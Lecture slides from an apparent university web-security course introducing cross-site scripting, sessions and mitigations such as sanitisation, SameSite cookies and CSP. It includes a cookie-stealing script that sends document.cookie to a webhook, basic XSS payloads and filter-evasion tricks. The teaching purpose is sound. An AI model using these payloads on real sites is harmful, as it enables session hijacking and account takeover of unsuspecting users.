Writing
Teaching
## Extended Lecture Week 3 ### Cross Site Scripting (XSS) ### Hello I am not Kris :) --- ## Briefly - `whoami` * Jesse Merhi (Like that plant + "he") * Product Security @ Atlassian * I tutor this course and 6443 (web apps) * Kris is sick (like the bad kind) -- ## Alright, COMP3900 whats it about? -- ## I was kidding -- ## No he wasn't he actually thought he was teaching 3900 -- ## Reminder about DBAD (Dont be a ...) - In week 1 we had tables dropped, and challenges broken (I will show you if you want lol). - In week 2 it was pretty tame. - This week we potentially have another case of DBAD -- ## What is legal by law ```python FOO="fake admin" ``` - Stealing FOO sessions - Stealing FOO credentials - Asking Kris (FOO) what is a JWT in the next lecture - Anything that doesn't impact another student :) -- ## Please dont ruin the experience for other people. ## If you want to experiment do so on your own hardware :) -- ## Question, Queries, Qoncerns? --- # Onto XSS -- ## What we need to know 1. Basic Programming (Bonus points if it is Javascript) 2. HTML 3. ~~Your credit card number~~ -- ## Who hear knows what HTML is? -- HTML is just a funky way to define boxes on a website. For example what does this look like? ```html <div style="background-color:blue;text-align:center;"> Box </div> ``` -- <div style="background-color:blue;text-align:center;"> Box </div> -- What about this? ```html <div style="background-color:blue;text-align:center;"> Box </div> <div style="background-color:red;text-align:center;"> Box </div> ``` -- <div style="background-color:blue;text-align:center;"> Box </div> <div style="background-color:red;text-align:center;"> Box </div> -- ## This can get a bit crazy <div style="background-color:blue;text-align:center;"> <div style="background-color:green;text-align:center;margin:20px;"> Box </div> <div style="background-color:pink;text-align:center;margin:20px;"> Box </div> </div> <div style="background-color:red;text-align:center;"> Box </div> -- ### *Jesse Shows the Class how to open dev tools and look at boxes* -- ## Just a bunch o' boxes (crazy stuff) --- ### Back to what we need to know --- Who knows Python? -- Who knows C? -- Who knows Java? -- Does anyone here not know any of these? -- Great so if you know basically any programming language, you are half way there. --- ## What is Javascript? --- ## Actually does anyone here know? -- ### Javascript is like most other languages - But its (mostly) used in a browser. - Pretty much every website you have visited has some sort of javascript on it. - My website has javascript *Jesse presses the theme button* - The main difference is that it is designed with browser and webpage interaction in mind. -- Demo Time [https://github.com/jesse-merhi/xss-sqli-demo](https://github.com/jesse-merhi/xss-sqli-demo) -- ### Secure commenting site - You can securely comment - You can even HTML things which is nice - How does this work? Go to the repo to find out :) - Melon originally wrote it (thanks melon) --- ### Javascript Console --- - Javascript is super similar to python - The console lets you run individual LINES of javascript. - VERY similar languages ```python # In Python we do print("Hello World"); ``` ```javascript // In Javascript we do console.log("Hello World"); ``` -- - Javascript is designed to interact with a browser! - Some cool things you can do: ```javascript document.location = "https://www.google.com"; print("JESSE"); document.querySelectorAll("*").forEach((element) => { element.style.backgroundColor = "red"; }); ``` --- What is the `<script>` tag? -- We can make javascript run on someone elses computer! --- ## QUESTIONS? --- ### Cross Site Scripting (XSS) --- ## [Self-Retweeting Tweet](https://www.youtube.com/watch?v=zv0kZKC6GAM) -- ## Here is another one ### [https://jmerhi.mov/bad](https://jmerhi.mov/bad) -- XSS is basically any vulnerability that allows javascript to run on someone elses computer. - Stored XSS: Javascript that is stored (usually in a database) and is executed! - Reflected XSS: Javascript that is stored somewhere on your personal browser/link and will be executed when a page is opened -- DOM BASED XSS (not assessable)  -- - Basically you are modifying the webpage in your XSS to trigger some things to happen. - Not assessed. -- - Stored XSS is really bad because it is **persistent** - Reflected is not as bad because it requires the user to do something (clicking a link perhaps). -- ## Back to the secrets page :) --- ## QUESTIONS? --- ### Sessions What is a session? *JESSE REALISES THAT HE IS LOGGED OUT OF GOOGLE* [https://www.google.com/](https://www.google.com/) --- ### Stealing Sessions ```javascript document.cookie; ``` ```javascript // Attacker can steal all of my cookies and login as me! <script>send_to_attacker(document.cookie)</script> ``` --- ### Did someone say demo? --- ```html <script> fetch("webhookurl?"+ document.cookie) </script> ``` --- ### Some example XSS Payloads: ```html <script>alert(1)</script> <script>console.log("haqd")</script> <script>print("haqd")</script> <img src="x" onerror="alert(1)" /> ``` --- ### Some good resources * [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection) * [OWASP Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) * [HackTricks](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting) * [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) --- ### MY COOKIES!!!! --- ### Oh well... ------ ## Mitigating XSS --- ### Basic WAF stuff * *Sanitisation*: stripping out unsafe tags/attributes * <script>alert(1)<script> → alert(1) * *Encoding*: escaping control characters * <> → \<\> * *Validation*: allow/block-listing of content * block requests if you detect bad content -- ### Don't use raw user input * `.innerHTML` treats content as HTML (control) * use `.innerText` which treats it as data * sanitize your input with a library (DOMPurify???) * don't write vanilla JS, use a framework. * again, even if you use a framework, make sure the functions you're using sanitize the input -- ### Breaking mitigations * Content stripped/blocked * embed dummy characters: `<SCRscriptIPT>` * use alternating case: `<ScRiPt>` * different tag `<img onerror=...>` * different event handler `<body onload=...>` [here's a couple more](https://github.com/payloadbox/xss-payload-list) --- ### Protecting those cookies (SameSite) * *None*: Cookies are always sent * *Lax*: (default) not sent cross-site * images/iframes *`no`* * navigation (GET) *`yes`* * *Strict*: Cookies aren't sent > read more [here](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite) --- ## In Short 1. Filter input on arrival 2. Encode data on output 3. Use appropriate response headers (tell the browser how to interpret content) 4. Content Security Policy --- ### Bonus: Bug Bounties if you find something cool - https://bugcrowd.com/engagements/atlassian - https://hackerone.com/riot?type=team